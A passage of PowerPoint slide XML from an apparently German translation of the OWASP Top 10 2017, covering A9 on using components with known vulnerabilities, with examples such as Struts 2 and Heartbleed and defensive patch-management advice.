                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, eine Remote Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Schwachstelle in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 2, die den Angreifer ermächtigt beliebigen Code auf dem Server auszuführen, wurde für einige erhebliche Sicherheitsvorfälle verantwortlich gemacht.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Obwohl das Patchen von Geräten des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Internet of Things (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oft nur sehr schwierig oder unmöglich ist, kann dies sehr wichtig sein (z.B. biomedizinische Geräte).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Es existieren automatisierte Tools, die einem Angreifer helfen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ungepatchte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder fehlkonfigurierte Systeme zu finden. Zum Beispiel kann die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Suchmaschine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> benutzt werden, um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Geräte zu finden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, die immer noch für die im April 2014 gepatchte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Heartbleed-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Schwachstelle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> verwundbar sind.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="de-DE" sz="900" u="sng"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Ist die Anwendung verwundbar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die Anwendung ist wahrscheinlich verwundbar, wenn:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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keine Kenntnis über Versionen der in der Anwendung benutzten Komponenten (sowohl client- als auch serverseitig) besteht. Dies beinhaltet sowohl direkte als auch indirekte, verschachtelte Abhängigkeiten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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verwendete Software verwundbar, nicht mehr unterstützt oder veraltet ist. Dies beinhaltet das Betriebssystem, den Web-/Applikationsserver, das Datenbankmanagementsystem (DBMS), Anwendungen, APIs und alle verwendeten Komponenten, Laufzeitumgebungen sowie Bibliotheken.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Schwachstellenscans nicht regelmäßig durchgeführt werden und sicherheitsrelevante, die benutzten Komponenten betreffende Bulletins nicht abonniert sind.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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die zugrundeliegende Plattform, das Framework und die Abhängigkeiten nicht risikobasiert und rechtzeitig repariert oder geupgradet werden. Dies passiert in der Regel in Umgebungen in denen Patchen eine monatliche oder quartalsweise Tätigkeit und einer Änderungskontrolle unterliegt. Dies setzt die Organisation unnötigerweise über Tage oder Monate dem Risiko von bereits gepatchten Schwachstellen aus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Tests für Kompatibilität von </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>geupdateter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder gepatchter Bibliotheken durch die Entwickler nicht durchgeführt werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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die Komponenten nicht sicher konfiguriert werden (siehe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A6:2017-Sicherheitsrelevante Fehlkonfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans"/>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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referenzen</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r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: V1 Architecture, design and threat modelling</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Dependency Check (for Java and .NET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Testing Guide: Map Application Architecture (OTG-INFO-010)</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Virtual Patching Best Practices</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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The Unfortunate Reality of Insecure Libraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vgl</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auch</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14"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> DC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</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MITRE Common Vulnerabilities and Exposures (CVE) search</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National Vulnerability Database (NVD)</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7"/>
              </a:rPr>
              <a:t>Retire.js for detecting known vulnerable JavaScript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8"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories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9"/>
              </a:rPr>
              <a:t>Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>and Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">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Wie kann ich das verhindern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Es sollte ein </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Patchmanagementprozess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> vorhanden sein:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Entferne unbenutzte Abhängigkeiten sowie unnötige Funktionen, Komponenten, Dateien und Dokumentationen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Fortlaufendes Inventarisieren der Versionen aller client- und server-seitig benutzten Komponenten (z.B. Frameworks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Biblio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-theken) sowie deren Abhängigkeiten unter Nutzung von Tools wie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>versions</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hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>DependencyCheck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17"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> etc. Fortlaufendes Auswerten von Quellen für Schwachstellen in Komponenten wie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Einsatz von Tools zur automatisieren Analyse der Softwarebestandteile. Bezug von CERT- und </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Herstellermeldungen über Schwachstellen der Komponenten.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Komponenten sollten ausschließlich von offiziellen Quellen über sichere Verbindungen bezogen werden. Signierte Pakete sollten bevorzugt werden, um die Gefahr der Nutzung einer modifizierten bösartigen Komponente zu verringern.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Überwachung zum Identifizieren von Bibliotheken und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kompo-nenten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, die nicht gewartet werden oder keine Sicherheits-updates für ältere Versionen bereitstellen. Sollte Patchen nicht möglich sein, sollte geprüft werden, einen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>virtuellen Patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> zu erstellen, um die gefundene Schwachstelle zu überwachen und um Angriffe zu entdecken und zu verhindern.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jede Organisation muss sicherstellen, dass ein fortlaufender Plan zur Überwachung, Bewertung und Anwendung von Updates oder Konfigurationsänderungen für die gesamte Lebenszeit einer Applikation oder des Portfolios besteht.</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A9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Nutzung von Komponenten mit bekannten Schwachstellen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297559953"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="225073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de-DE" sz="1100" noProof="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de-DE" sz="1100" noProof="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de-DE" sz="1100" noProof="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de-DE" sz="1000" b="1" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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de-DE" sz="900" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
